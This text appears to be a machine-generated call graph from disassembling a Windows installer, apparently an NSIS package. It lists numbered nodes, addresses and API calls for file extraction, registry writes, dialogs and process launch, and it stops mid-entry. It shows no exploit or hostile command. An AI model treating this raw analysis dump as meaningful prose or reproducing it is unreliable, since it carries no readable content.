GlobalAlloc 5183->5185 5188 40276b DeleteFileA 5184->5188 5189 40277e 5184->5189 5186 40275a CloseHandle 5185->5186 5187 4026df 5185->5187 5186->5184 5202 4031cc SetFilePointer 5187->5202 5188->5189 5191 4026e5 5192 4031b6 ReadFile 5191->5192 5193 4026ee GlobalAlloc 5192->5193 5194 402732 WriteFile GlobalFree 5193->5194 5195 4026fe 5193->5195 5196 402f1f 46 API calls 5194->5196 5197 402f1f 46 API calls 5195->5197 5198 402757 5196->5198 5200 40270b 5197->5200 5198->5186 5199 402729 GlobalFree 5199->5194 5200->5199 5201->5183 5202->5191 5203 401705 5204 4029fd 18 API calls 5203->5204 5205 40170c SearchPathA 5204->5205 5206 4027bd 5205->5206 5207 401727 5205->5207 5207->5206 5209 405d36 lstrcpynA 5207->5209 5209->5206 5210 100029c7 5211 100029df 5210->5211 5212 10001534 2 API calls 5211->5212 5213 100029fa 5212->5213 4149 40218a 4150 4029fd 18 API calls 4149->4150 4151 402190 4150->4151 4152 4029fd 18 API calls 4151->4152 4153 402199 4152->4153 4154 4029fd 18 API calls 4153->4154 4155 4021a2 4154->4155 4164 40603a FindFirstFileA 4155->4164 4158 4021bc lstrlenA lstrlenA 4160 40501f 25 API calls 4158->4160 4159 40501f 25 API calls 4163 4021b7 4159->4163 4161 4021f8 SHFileOperationA 4160->4161 4162 4021af 4161->4162 4161->4163 4162->4159 4162->4163 4165 406050 FindClose 4164->4165 4166 4021ab 4164->4166 4165->4166 4166->4158 4166->4162 5214 40280a 5215 4029e0 18 API calls 5214->5215 5216 402810 5215->5216 5217 402841 5216->5217 5218 402663 5216->5218 5220 40281e 5216->5220 5217->5218 5219 405d58 18 API calls 5217->5219 5219->5218 5220->5218 5222 405c94 wsprintfA 5220->5222 5222->5218 5223 40220c 5224 402213 5223->5224 5228 402226 5223->5228 5225 405d58 18 API calls 5224->5225 5226 402220 5225->5226 5227 40554a MessageBoxIndirectA 5226->5227 5227->5228 5229 401490 5230 40501f 25 API calls 5229->5230 5231 401497 5230->5231 5232 406310 5234 406194 5232->5234 5233 406aff 5234->5233 5235 406215 GlobalFree 5234->5235 5236 40621e GlobalAlloc 5234->5236 5237 406295 GlobalAlloc 5234->5237 5238 40628c GlobalFree 5234->5238 5235->5236 5236->5233 5236->5234 5237->5233 5237->5234 5238->5237 4191 401b11 4192 401b62 4191->4192 4193 401b1e 4191->4193 4194 401b66 4192->4194 4195 401b8b GlobalAlloc 4192->4195 4196 401ba6 4193->4196 4201 401b35 4193->4201 4204 402226 4194->4204 4212 405d36 lstrcpynA 4194->4212 4197 405d58 18 API calls 4195->4197 4198 405d58 18 API calls 4196->4198 4196->4204 4197->4196 4200 402220 4198->4200 4213 40554a 4200->4213 4210 405d36 lstrcpynA 4201->4210 4203 401b78 GlobalFree 4203->4204 4206 401b44 4211 405d36 lstrcpynA 4206->4211 4208 401b53 4217 405d36 lstrcpynA 4208->4217 4210->4206 4211->4208 4212->4203 4216 40555f 4213->4216 4214 4055ab 4214->4204 4215 405573 MessageBoxIndirectA 4215->4214 4216->4214 4216->4215 4217->4204 5239 404f93 5240 404fa3 5239->5240 5241 404fb7 5239->5241 5242 404fa9 5240->5242 5251 405000 5240->5251 5243 404fbf IsWindowVisible 5241->5243 5247 404fd6 5241->5247 5245 404038 SendMessageA 5242->5245 5246 404fcc 5243->5246 5243->5251 5244 405005 CallWindowProcA 5248 404fb3 5244->5248 5245->5248 5252 4048ea SendMessageA 5246->5252 5247->5244 5257 40496a 5247->5257 5251->5244 5253 404949 SendMessageA 5252->5253 5254 40490d GetMessagePos ScreenToClient SendMessageA 5252->5254 5255 404941 5253->5255 5254->5255 5256 404946 5254->5256 5255->5247 5256->5253 5266 405d36 lstrcpynA 5257->5266 5259 40497d 5267 405c94 wsprintfA 5259->5267 5261 404987 5262 40140b 2 API calls 5261->5262 5263 404990 5262->5263 5268 405d36 lstrcpynA 5263->5268 5265 404997 5265->5251 5266->5259 5267->5261 5268->5265 5269 401c95 5270 4029e0 18 API calls 5269->5270 5271 401c9c 5270->5271 5272 4029e0 18 API calls 5271->5272 5273 401ca4 GetDlgItem 5272->5273 5274 4024cb 5273->5274 5275 401595 5276 4029fd 18 API calls 5275->5276 5277 40159c SetFileAttributesA 5276->5277 5278 4015ae 5277->5278 4266 403217 #17 SetErrorMode OleInitialize 4267 406061 3 API calls 4266->4267 4268 40325c SHGetFileInfoA 4267->4268 4341 405d36 lstrcpynA 4268->4341 4270 403287 GetCommandLineA 4342 405d36 lstrcpynA 4270->4342 4272 403299 GetModuleHandleA 4273 4032b0 4272->4273 4274 4057f1 CharNextA 4273->4274 4275 4032c4 CharNextA 4274->4275 4281 4032d4 4275->4281 4276 40339e 4277 4033b1 GetTempPathA 4276->4277 4343 4031e3 4277->4343 4279 4033c9 4282 403423 DeleteFileA 4279->4282 4283 4033cd GetWindowsDirectoryA lstrcatA 4279->4283 4280 4057f1 CharNextA 4280->4281 4281->4276 4281->4280 4286 4033a0 4281->4286 4351 402c79 GetTickCount GetModuleFileNameA 4282->4351 4285 4031e3 11 API calls 4283->4285 4288 4033e9 4285->4288 4435 405d36 lstrcpynA 4286->4435 4287 403437 4295 4057f1 CharNextA 4287->4295 4324 4034bd 4287->4324 4335 4034cd 4287->4335 4288->4282 4290 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4288->4290 4291 4031e3 11 API calls 4290->4291 4293 40341b 4291->4293 4293->4282 4293->4335 4297 403452 4295->4297 4304 403498 4297->4304 4305 4034fc lstrcatA lstrcmpiA 4297->4305 4298 4034e6 4301 40554a MessageBoxIndirectA 4298->4301 4299 4035da 4300 40367d ExitProcess 4299->4300 4303 406061 3 API calls 4299->4303 4306 4034f4 ExitProcess 4301->4306 4307 4035ed 4303->4307 4436 4058b4 4304->4436 4309 403518 CreateDirectoryA SetCurrentDirectoryA 4305->4309 4305->4335 4312 406061 3 API calls 4307->4312 4310 40353a 4309->4310 4311 40352f 4309->4311 4462 405d36 lstrcpynA 4310->4462 4461 405d36 lstrcpynA 4311->4461 4316 4035f6 4312->4316 4318 406061 3 API calls 4316->4318 4320 4035ff 4318->4320 4319 4034b2 4451 405d36 lstrcpynA 4319->4451 4323 40361d 4320->4323 4329 40360d GetCurrentProcess 4320->4329 4322 405d58 18 API calls 4325 403579 DeleteFileA 4322->4325 4326 406061 3 API calls 4323->4326 4381 403787 4324->4381 4327 403586 CopyFileA 4325->4327 4338 403548 4325->4338 4328 403654 4326->4328 4327->4338 4331 403669 ExitWindowsEx 4328->4331 4334 403676 4328->4334 4329->4323 4330 4035ce 4332 405bea 40 API calls 4330->4332 4331->4300 4331->4334 4332->4335 4471 40140b 4334->4471 4452 403695 4335->4452 4337 405d58 18 API calls 4337->4338 4338->4322 4338->4330 4338->4337 4340 4035ba CloseHandle 4338->4340 4463 405bea 4338->4463 4468 4054e5 CreateProcessA 4338->4468 4340->4338 4341->4270 4342->4272 4344 405fa1 5 API calls 4343->4344 4346 4031ef 4344->4346 4345 4031f9 4345->4279 4346->4345 4474 4057c6 lstrlenA CharPrevA 4346->4474 4349 4059f6 2 API calls 4350 403215 4349->4350 4350->4279 4477 4059c7 GetFileAttributesA CreateFileA 4351->4477 4353 402cbc 4380 402cc9 4353->4380 4478 405d36 lstrcpynA 4353->4478 4355 402cdf 4479 40580d lstrlenA 4355->4479 4359 402cf0 GetFileSize 4360 402df1 4359->4360 4362 402d07 4359->4362 4484 402bda 4360->4484 4362->4360 4366 402e8c 4362->4366 4373 402bda 33 API calls 4362->4373 4362->4380 4515 4031b6 4362->4515 4365 402e34 GlobalAlloc 4370 402e4b 4365->4370 4367 402bda 33 API calls 4366->4367 4367->4380 4369 402e15 4372 4031b6 ReadFile 4369->4372 4371 4059f6 2 API calls 4370->4371 4374 402e5c CreateFileA 4371->4374 4375 402e20 4372->4375 4373->4362 4376 402e96 4374->4376 4374->4380 4375->4365 4375->4380 4499 4031cc SetFilePointer 4376->4499 4378 402ea4 4500 402f1f 4378->4500 4380->4287 4382 406061 3 API calls 4381->4382 4383 40379b 4382->4383 4384 4037a1 4383->4384 4385 4037b3 4383->4385 4565 405c94 wsprintfA 4384->4565 4386 405c1d 3 API calls 4385->4386 4387 4037de 4386->4387 4388 4037fc lstrcatA 4387->4388 4390 405c1d 3 API calls 4387->4390 4391 4037b1 4388->4391 4390->4388 4549 403a4c 4391->4549 4394 4058b4 18 API calls 4395 40382e 4394->4395 4396 4038b7 4395->4396 4398 405c1d 3 API calls 4395->4398 4397 4058b4 18 API calls 4396->4397 4399 4038bd 4397->4399 4400 40385a 4398->4400 4401 4038cd LoadImageA 4399->4401 4402 405d58 18 API calls 4399->4402 4400->4396 4408 403876 lstrlenA 4400->4408 4409 4057f1 CharNextA 4400->4409 4403 403973 4401->4403 4404 4038f4 RegisterClassA 4401->4404 4402->4401 4407 40140b 2 API calls 4403->4407 4405 40397d 4404->4405 4406 40392a SystemParametersInfoA CreateWindowExA 4404->4406 4405->4335 4406->4403 4412 403979 4407->4412 4410 403884 lstrcmpiA 4408->4410 4411 4038aa 4408->4411 4413 403874 4409->4413 4410->4411 4414 403894 GetFileAttributesA 4410->4414 4415 4057c6 3 API calls 4411->4415 4412->4405 4417 403a4c 19 API calls 4412->4417 4413->4408 4416 4038a0 4414->4416 4418 4038b0 4415->4418 4416->4411 4419 40580d 2 API calls 4416->4419 4420 40398a 4417->4420 4566 405d36 lstrcpynA 4418->4566 4419->4411 4422 403996 ShowWindow LoadLibraryA 4420->4422 4423 403a19 4420->4423 4425 4039b5 LoadLibraryA 4422->4425 4426 4039bc GetClassInfoA 4422->4426 4558 4050f1 OleInitialize 4423->4558 4425->4426 4428 4039d0 GetClassInfoA RegisterClassA 4426->4428 4429 4039e6 DialogBoxParamA 4426->4429 4427 403a1f 4431 403a23 4427->4431 4432 403a3b 4427->4432 4428->4429 4430 40140b 2 API calls 4429->4430 4430->4405 4431->4405 4434 40140b 2 API calls 4431->4434 4433 40140b 2 API calls 4432->4433 4433->4405 4434->4405 4435->4277 4575 405d36 lstrcpynA 4436->4575 4438 4058c5 4439 40585f 4 API calls 4438->4439 4440 4058cb 4439->4440 4441 4034a3 4440->4441 4442 405fa1 5 API calls 4440->4442 4441->4335 4450 405d36 lstrcpynA 4441->4450 4448 4058db 4442->4448 4443 405906 lstrlenA 4444 405911 4443->4444 4443->4448 4446 4057c6 3 API calls 4444->4446 4445 40603a 2 API calls 4445->4448 4447 405916 GetFileAttributesA 4446->4447 4447->4441 4448->4441 4448->4443 4448->4445 4449 40580d 2 API calls 4448->4449 4449->4443 4450->4319 4451->4324 4453 4036b0 4452->4453 4454 4036a6 CloseHandle 4452->4454 4455 4036c4 4453->4455 4456 4036ba CloseHandle 4453->4456 4454->4453 4576 4036f2 4455->4576 4456->4455 4461->4310 4462->4338 4464 406061 3 API calls 4463->4464 4465 405bf1 4464->4465 4467 405c12 4465->4467 4633 405a6e lstrcpyA 4465->4633 4467->4338 4469 405524 4468->4469 4470 405518 CloseHandle 4468->4470 4469->4338 4470->4469 4472 401389 2 API calls 4471->4472 4473 401420 4472->4473 4473->4300 4475 4057e0 lstrcatA 4474->4475 4476 403201 CreateDirectoryA 4474->4476 4475->4476 4476->4349 4477->4353 4478->4355 4480 40581a 4479->4480 4481 402ce5 4480->4481 4482 40581f CharPrevA 4480->4482 4483 405d36 lstrcpynA 4481->4483 4482->4480 4482->4481 4483->4359 4485 402c00 4484->4485 4486 402be8 4484->4486 4488 402c10 GetTickCount 4485->4488 4489 402c08 4485->4489 4487 402bf1 DestroyWindow 4486->4487 4494 402bf8 4486->4494 4487->4494 4491 402c1e 4488->4491 4488->4494 4519 40609a 4489->4519 4492 402c53 CreateDialogParamA ShowWindow 4491->4492 4493 402c26 4491->4493 4492->4494 4493->4494 4523 402bbe 4493->4523 4494->4365 4494->4380 4518 4031cc SetFilePointer 4494->4518 4496 402c34 wsprintfA 4497 40501f 25 API calls 4496->4497 4498 402c51 4497->4498 4498->4494 4499->4378 4501 402f4b 4500->4501 4502 402f2f SetFilePointer 4500->4502 4526 40303a GetTickCount 4501->4526 4502->4501 4507 40303a 43 API calls 4508 402f82 4507->4508 4509 402ffc ReadFile 4508->4509 4511 402ff6 4508->4511 4514 402f92 4508->4514 4509->4511 4511->4380 4512 405a3f ReadFile 4512->4514 4513 402fc5 WriteFile 4513->4511 4513->4514 4514->4511 4514->4512 4514->4513 4516 405a3f ReadFile 4515->4516 4517 4031c9 4516->4517 4517->4362 4518->4369 4520 4060b7 PeekMessageA 4519->4520 4521 4060c7 4520->4521 4522 4060ad DispatchMessageA 4520->4522 4521->4494 4522->4520 4524 402bcd 4523->4524 4525 402bcf MulDiv 4523->4525 4524->4525 4525->4496 4527 4031a4 4526->4527 4528 403069 4526->4528 4529 402bda 33 API calls 4527->4529 4541 4031cc SetFilePointer 4528->4541 4536 402f52 4529->4536 4531 403074 SetFilePointer 4535 403099 4531->4535 4532 4031b6 ReadFile 4532->4535 4534 402bda 33 API calls 4534->4535 4535->4532 4535->4534 4535->4536 4537 40312e WriteFile 4535->4537 4538 403185 SetFilePointer 4535->4538 4542 406161 4535->4542 4536->4511 4539 405a3f ReadFile 4536->4539 4537->4535 4537->4536 4538->4527 4540 402f6b 4539->4540 4540->4507 4540->4511 4541->4531 4543 406186 4542->4543 4546 40618e 4542->4546 4543->4535 4544 406215 GlobalFree 4545 40621e GlobalAlloc 4544->4545 4545->4543 4545->4546 4546->4543 4546->4544 4546->4545 4547 406295 GlobalAlloc 4546->4547 4548 40628c GlobalFree 4546->4548 4547->4543 4547->4546 4548->4547 4550 403a60 4549->4550 4567 405c94 wsprintfA 4550->4567 4552 403ad1 4553 405d58 18 API calls 4552->4553 4554 403add SetWindowTextA 4553->4554 4555 40380c 4554->4555 4556 403af9 4554->4556 4555->4394 4556->4555 4557 405d58 18 API calls 4556->4557 4557->4556 4568 404038 4558->4568 4560 40513b 4561 404038 SendMessageA 4560->4561 4563 40514d OleUninitialize 4561->4563 4562 405114 4562->4560 4571 401389 4562->4571 4563->4427 4565->4391 4566->4396 4567->4552 4569 404050 4568->4569 4570 404041 SendMessageA 4568->4570 4569->4562 4570->4569 4573 401390 4571->4573 4572 4013fe 4572->4562 4573->4572 4574 4013cb MulDiv SendMessageA 4573->4574 4574->4573 4575->4438 4577 403700 4576->4577 4578 4036c9 4577->4578 4579 403705 FreeLibrary GlobalFree 4577->4579 4580 4055f6 4578->4580 4579->4578 4579->4579 4581 4058b4 18 API calls 4580->4581 4582 405616 4581->4582 4583 405635 4582->4583 4584 40561e DeleteFileA 4582->4584 4586 405763 4583->4586 4620 405d36 lstrcpynA 4583->4620 4585 4034d6 OleUninitialize 4584->4585 4585->4298 4585->4299 4586->4585 4591 40603a 2 API calls 4586->4591 4588 40565b 4589 405661 lstrcatA 4588->4589 4590 40566e 4588->4590 4592 405674 4589->4592 4593 40580d 2 API calls 4590->4593 4594 405787 4591->4594 4595 405682 lstrcatA 4592->4595 4597 40568d lstrlenA FindFirstFileA 4592->4597 4593->4592 4594->4585 4596 40578b 4594->4596 4595->4597 4598 4057c6 3 API calls 4596->4598 4597->4586 4602 4056b1 4597->4602 4599 405791 4598->4599 4601 4055ae 5 API calls 4599->4601 4600 4057f1 CharNextA 4600->4602 4603 40579d 4601->4603 4602->4600 4607 405742 FindNextFileA 4602->4607 4616 405703 4602->4616 4621 405d36 lstrcpynA 4602->4621 4604 4057a1 4603->4604 4605 4057b7 4603->4605 4604->4585 4610 40501f 25 API calls 4604->4610 4606 40501f 25 API calls 4605->4606 4606->4585 4607->4602 4609 40575a FindClose 4607->4609 4609->4586 4611 4057ae 4610->4611 4612 405bea 40 API calls 4611->4612 4615 4057b5 4612->4615 4614 4055f6 64 API calls 4614->4616 4615->4585 4616->4607 4616->4614 4617 40501f 25 API calls 4616->4617 4618 40501f 25 API calls 4616->4618 4619 405bea 40 API calls 4616->4619 4622 4055ae 4616->4622 4617->4607 4618->4616 4619->4616 4620->4588 4621->4602 4630 4059a2 GetFileAttributesA 4622->4630 4625 4055db 4625->4616 4626 4055d1 DeleteFileA 4628 4055d7 4626->4628 4627 4055c9 RemoveDirectoryA 4627->4628 4628->4625 4629 4055e7 SetFileAttributesA 4628->4629 4629->4625 4631 4055ba 4630->4631 4632 4059b4 SetFileAttributesA 4630->4632 4631->4625 4631->4626 4631->4627 4632->4631 4634 405a97 4633->4634 4635 405abd GetShortPathNameA 4633->4635 4658 4059c7 GetFileAttributesA CreateFileA 4634->4658 4637 405ad2 4635->4637 4638 405be4 4635->4638 4637->4638 4640 405ada wsprintfA 4637->4640 4638->4467 4639 405aa1 CloseHandle GetShortPathNameA 4639->4638 4641 405ab5 4639->4641 4642 405d58 18 API calls 4640->4642 4641->4635 4641->4638 4643 405b02 4642->4643 4659 4059c7 GetFileAttributesA CreateFileA 4643->4659 4645 405b0f 4645->4638 4646 405b1e GetFileSize GlobalAlloc 4645->4646 4647 405b40 4646->4647 4648 405bdd CloseHandle 4646->4648 4649 405a3f ReadFile 4647->4649 4648->4638 4650 405b48 4649->4650 4650->4648 4660 40592c lstrlenA 4650->4660 4653 405b73 4655 40592c 4 API calls 4653->4655 4654 405b5f lstrcpyA 4656 405b81 4654->4656 4655->4656 4657 405bb8 SetFilePointer WriteFile GlobalFree 4656->4657 4657->4648 4658->4639 4659->4645 4661 40596d lstrlenA 4660->4661 4662 405975 4661->4662 4663 405946 lstrcmpiA 4661->4663 4662->4653 4662->4654 4663->4662 4664 405964 CharNextA 4663->4664 4664->4661 5279 10001058 5281 10001074 5279->5281 5280 100010dc 5281->5280 5282 100014bb GlobalFree 5281->5282 5283 10001091 5281->5283 5282->5283 5284 100014bb GlobalFree 5283->5284 5285 100010a1 5284->5285 5286 100010b1 5285->5286 5287 100010a8 GlobalSize 5285->5287 5288 100010b5 GlobalAlloc 5286->5288 5289 100010c6 5286->5289 5287->5286 5290 100014e2 3 API calls 5288->5290 5291 100010d1 GlobalFree 5289->5291 5290->5289 5291->5280 4705 403b19 4706 403b31 4705->4706 4707 403c6c 4705->4707 4706->4707 4710 403b3d 4706->4710 4708 403cbd 4707->4708 4709 403c7d GetDlgItem GetDlgItem 4707->4709 4712 403d17 4708->4712 4722 401389 2 API calls 4708->4722 4711 403fec 19 API calls 4709->4711 4713 403b48 SetWindowPos 4710->4713 4714 403b5b 4710->4714 4717 403ca7 SetClassLongA 4711->4717 4718 404038 SendMessageA 4712->4718 4736 403c67 4712->4736 4713->4714 4715 403b60 ShowWindow 4714->4715 4716 403b78 4714->4716 4715->4716 4719 403b80 DestroyWindow 4716->4719 4720 403b9a 4716->4720 4721 40140b 2 API calls 4717->4721 4744 403d29 4718->4744 4774 403f75 4719->4774 4723 403bb0 4720->4723 4724 403b9f SetWindowLongA 4720->4724 4721->4708 4725 403cef 4722->4725 4728 403c59 4723->4728 4729 403bbc GetDlgItem 4723->4729 4724->4736 4725->4712 4730 403cf3 SendMessageA 4725->4730 4726 40140b 2 API calls 4726->4744 4727 403f77 DestroyWindow EndDialog 4727->4774 4784 404053 4728->4784 4732 403bec 4729->4732 4733 403bcf SendMessageA IsWindowEnabled 4729->4733 4730->4736 4731 403fa6 ShowWindow 4731->4736 4737 403bf9 4732->4737 4739 403c40 SendMessageA 4732->4739 4740 403c0c 4732->4740 4748 403bf1 4732->4748 4733->4732 4733->4736 4735 405d58 18 API calls 4735->4744 4737->4739 4737->4748 4739->4728 4741 403c14 4740->4741 4742 403c29 4740->4742 4745 40140b 2 API calls 4741->4745 4746 40140b 2 API calls 4742->4746 4743 403c27 4743->4728 4744->4726 4744->4727 4744->4735 4744->4736 4747 403fec 19 API calls 4744->4747 4765 403eb7 DestroyWindow 4744->4765 4775 403fec 4744->4775 4745->4748 4749 403c30 4746->4749 4747->4744 4781 403fc5 4748->4781 4749->4728 4749->4748 4751 403da4 GetDlgItem 4752 403dc1 ShowWindow KiUserCallbackDispatcher 4751->4752 4753 403db9 4751->4753 4778 40400e KiUserCallbackDispatcher 4752->4778 4753->4752 4755 403deb EnableWindow 4758 403dff 4755->4758 4756 403e04 GetSystemMenu EnableMenuItem SendMessageA 4757 403e34 SendMessageA 4756->4757 4756->4758 4757->4758 4758->4756 4779 404021 SendMessageA 4758->4779 4780 405d36 lstrcpynA 4758->4780 4761 403e62 lstrlenA 4762 405d58 18 API calls 4761->4762 4763 403e73 SetWindowTextA 4762->4763 4764 401389 2 API calls 4763->4764 4764->4744 4766 403ed1 CreateDialogParamA 4765->4766 4765->4774 4767 403f04 4766->4767 4766->4774 4768 403fec 19 API calls 4767->4768 4769 403f0f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4768->4769 4770 401389 2 API calls 4769->4770 4771 403f55 4770->4771 4771->4736 4772 403f5d ShowWindow 4771->4772 4773 404038 SendMessageA 4772->4773 4773->4774 4774->4731 4774->4736 4776 405d58 18 API calls 4775->4776 4777 403ff7 SetDlgItemTextA 4776->4777 4777->4751 4778->4755 4779->4758 4780->4761 4782 403fd2 SendMessageA 4781->4782 4783 403fcc 4781->4783 4782->4743 4783->4782 4785 40406b GetWindowLongA 4784->4785 4795 4040f4 4784->4795 4786 40407c 4785->4786 4785->4795 4787 40408b GetSysColor 4786->4787 4788 40408e 4786->4788 4787->4788 4789 404094 SetTextColor 4788->4789 4790 40409e SetBkMode 4788->4790 4789->4790 4791 4040b6 GetSysColor 4790->4791 4792 4040bc 4790->4792 4791->4792 4793 4040c3 SetBkColor 4792->4793 4794 4040cd 4792->4794 4793->4794 4794->4795 4796 4040e0 DeleteObject 4794->4796 4797 4040e7 CreateBrushIndirect 4794->4797 4795->4736 4796->4797 4797->4795 5299 402519 5300 4029e0 18 API calls 5299->5300 5304 402523 5300->5304 5301 40258d 5302 405a3f ReadFile 5302->5304 5303 40258f 5308 405c94 wsprintfA 5303->5308 5304->5301 5304->5302 5304->5303 5305 40259f 5304->5305 5305->5301 5307 4025b5 SetFilePointer 5305->5307 5307->5301 5308->5301 4824 40231c 4825 402322 4824->4825 4826 4029fd 18 API calls 4825->4826 4827 402334 4826->4827 4828 4029fd 18 API calls 4827->4828 4829 40233e RegCreateKeyExA 4828->4829 4830 402663 4829->4830 4831 402368 4829->4831 4832 402380 4831->4832 4833 4029fd 18 API calls 4831->4833 4834 40238c 4832->4834 4837 4029e0 18 API calls 4832->4837 4836 402379 lstrlenA 4833->4836 4835 4023a7 RegSetValueExA 4834->4835 4838 402f1f 46 API calls 4834->4838 4839 4023bd RegCloseKey 4835->4839 4836->4832 4837->4834 4838->4835 4839->4830 5309 40261c 5310 402637 5309->5310 5311 40261f 5309->5311 5313 4027bd 5310->5313 5315 405d36 lstrcpynA 5310->5315 5312 40262c FindNextFileA 5311->5312 5312->5310 5315->5313 5316 40499c GetDlgItem GetDlgItem 5317 4049ee 7 API calls 5316->5317 5359 404c06 5316->5359 5318 404a91 DeleteObject 5317->5318 5319 404a84 SendMessageA 5317->5319 5320 404a9a 5318->5320 5319->5318 5322 404ad1 5320->5322 5323 405d58 18 API calls 5320->5323 5321 404cea 5325 404d96 5321->5325 5330 404bf9 5321->5330 5335 404d43 SendMessageA 5321->5335 5324 403fec 19 API calls 5322->5324 5326 404ab3 SendMessageA SendMessageA 5323->5326 5329 404ae5 5324->5329 5327 404da0 SendMessageA 5325->5327 5328 404da8 5325->5328 5326->5320 5327->5328 5337 404dc1 5328->5337 5338 404dba ImageList_Destroy 5328->5338 5346 404dd1 5328->5346 5334 403fec 19 API calls 5329->5334 5331 404053 8 API calls 5330->5331 5336 404f8c 5331->5336 5332 404cdc SendMessageA 5332->5321 5333 4048ea 5 API calls 5349 404c77 5333->5349 5350 404af3 5334->5350 5335->5330 5340 404d58 SendMessageA 5335->5340 5341 404dca GlobalFree 5337->5341 5337->5346 5338->5337 5339 404f40 5339->5330 5344 404f52 ShowWindow GetDlgItem ShowWindow 5339->5344 5343 404d6b 5340->5343 5341->5346 5342 404bc7 GetWindowLongA SetWindowLongA 5345 404be0 5342->5345 5351 404d7c SendMessageA 5343->5351 5344->5330 5347 404be6 ShowWindow 5345->5347 5348 404bfe 5345->5348 5346->5339 5358 40496a 4 API calls 5346->5358 5363 404e0c 5346->5363 5367 404021 SendMessageA 5347->5367 5368 404021 SendMessageA 5348->5368 5349->5321 5349->5332 5350->5342 5352 404bc1 5350->5352 5355 404b42 SendMessageA 5350->5355 5356 404b7e SendMessageA 5350->5356 5357 404b8f SendMessageA 5350->5357 5351->5325 5352->5342 5352->5345 5355->5350 5356->5350 5357->5350 5358->5363 5359->5321 5359->5333 5359->5349 5360 404f16 InvalidateRect 5360->5339 5361 404f2c 5360->5361 5369 4048a5 5361->5369 5362 404e3a SendMessageA 5366 404e50 5362->5366 5363->5362 5363->5366 5365 404ec4 SendMessageA SendMessageA 5365->5366 5366->5360 5366->5365 5367->5330 5368->5359 5372 4047e0 5369->5372 5371 4048ba 5371->5339 5373 4047f6 5372->5373 5374 405d58 18 API calls 5373->5374 5375 40485a 5374->5375 5376 405d58 18 API calls 5375->5376 5377 404865 5376->5377 5378 405d58 18 API calls 5377->5378 5379 40487b lstrlenA wsprintfA SetDlgItemTextA 5378->5379 5379->5371 5380 100010e0 5381 1000110e 5380->5381 5382 100011c4 GlobalFree 5381->5382 5383 100012ad 2 API calls 5381->5383 5384 100011c3 5381->5384 5385 10001266 2 API calls 5381->5385 5386 10001155 GlobalAlloc 5381->5386 5387 100011ea GlobalFree 5381->5387 5388 100011b1 GlobalFree 5381->5388 5389 100012d1 lstrcpyA 5381->5389 5383->5381 5384->5382 5385->5388 5386->5381 5387->5381 5388->5381 5389->5381 5390 4016a1 5391 4029fd 18 API calls 5390->5391 5392 4016a7 GetFullPathNameA 5391->5392 5393 4016be 5392->5393 5394 4016df 5392->5394 5393->5394 5397 40603a 2 API calls 5393->5397 5395 402892 5394->5395 5396 4016f3 GetShortPathNameA 5394->5396 5396->5395 5398 4016cf 5397->5398 5398->5394 5400 405d36 lstrcpynA 5398->5400 5400->5394 5401 10002162 5402 100021c0 5401->5402 5404 100021f6 5401->5404 5403 100021d2 GlobalAlloc 5402->5403 5402->5404 5403->5402 5405 401d26 GetDC GetDeviceCaps 5406 4029e0 18 API calls 5405->5406 5407 401d44 MulDiv ReleaseDC 5406->5407 5408 4029e0 18 API calls 5407->5408 5409 401d63 5408->5409 5410 405d58 18 API calls 5409->5410 5411 401d9c CreateFontIndirectA 5410->5411 5412 4024cb 5411->5412 5413 40442a 5414 404456 5413->5414 5415 404467 5413->5415 5474 40552e GetDlgItemTextA 5414->5474 5417 404473 GetDlgItem 5415->5417 5418 4044d2 5415->5418 5421 404487 5417->5421 5419 4045b6 5418->5419 5428 405d58 18 API calls 5418->5428 5472 40475f 5418->5472 5419->5472 5476 40552e GetDlgItemTextA 5419->5476 5420 404461 5422 405fa1 5 API calls 5420->5422 5423 40449b SetWindowTextA 5421->5423 5426 40585f 4 API calls 5421->5426 5422->5415 5427 403fec 19 API calls 5423->5427 5425 404053 8 API calls 5430 404773 5425->5430 5431 404491 5426->5431 5432 4044b7 5427->5432 5433 404546 SHBrowseForFolderA 5428->5433 5429 4045e6 5434 4058b4 18 API calls 5429->5434 5431->5423 5438 4057c6 3 API calls 5431->5438 5435 403fec 19 API calls 5432->5435 5433->5419 5436 40455e CoTaskMemFree 5433->5436 5437 4045ec 5434->5437 5439 4044c5 5435->5439 5440 4057c6 3 API calls 5436->5440 5477 405d36 lstrcpynA 5437->5477 5438->5423 5475 404021 SendMessageA 5439->5475 5442 40456b 5440->5442 5445 4045a2 SetDlgItemTextA 5442->5445 5449 405d58 18 API calls 5442->5449 5444 4044cb 5447 406061 3 API calls 5444->5447 5445->5419 5446 404603 5448 406061 3 API calls 5446->5448 5447->5418 5455 40460b 5448->5455 5451 40458a lstrcmpiA 5449->5451 5450 404645 5478 405d36 lstrcpynA 5450->5478 5451->5445 5452 40459b lstrcatA 5451->5452 5452->5445 5454 40464e 5456 40585f 4 API calls 5454->5456 5455->5450 5460 40580d 2 API calls 5455->5460 5461 40469d 5455->5461 5457 404654 GetDiskFreeSpaceA 5456->5457 5459 404676 MulDiv 5457->5459 5457->5461 5459->5461 5460->5455 5462 40470e 5461->5462 5464 4048a5 21 API calls 5461->5464 5463 404731 5462->5463 5465 40140b 2 API calls 5462->5465 5479 40400e KiUserCallbackDispatcher 5463->5479 5466 4046fb 5464->5466 5465->5463 5468 404710 SetDlgItemTextA 5466->5468 5469 404700 5466->5469 5468->5462 5470 4047e0 21 API calls 5469->5470 5470->5462 5471 40474d 5471->5472 5480 4043bf 5471->5480 5472->5425 5474->5420 5475->5444 5476->5429 5477->5446 5478->5454 5479->5471 5481 4043d2 SendMessageA 5480->5481 5482 4043cd 5480->5482 5481->5472 5482->5481 4167 40172c 4168 4029fd 18 API calls 4167->4168 4169 401733 4168->4169 4173 4059f6 4169->4173 4171 40173a 4172 4059f6 2 API calls 4171->4172 4172->4171 4174 405a01 GetTickCount GetTempFileNameA 4173->4174 4175 405a32 4174->4175 4176 405a2e 4174->4176 4175->4171 4176->4174 4176->4175 4177 401dac 4185 4029e0 4177->4185 4179 401db2 4180 4029e0 18 API calls 4179->4180 4181 401dbb 4180->4181 4182 401dc2 ShowWindow 4181->4182 4183 401dcd EnableWindow 4181->4183 4184 402892 4182->4184 4183->4184 4186 405d58 18 API calls 4185->4186 4187 4029f4 4186->4187 4187->4179 5483 401eac 5484 4029fd 18 API calls 5483->5484 5485 401eb3 5484->5485 5486 40603a 2 API calls 5485->5486 5487 401eb9 5486->5487 5489 401ecb 5487->5489 5490 405c94 wsprintfA 5487->5490 5490->5489 5491 40192d 5492 4029fd 18 API calls 5491->5492 5493 401934 lstrlenA 5492->5493 5494 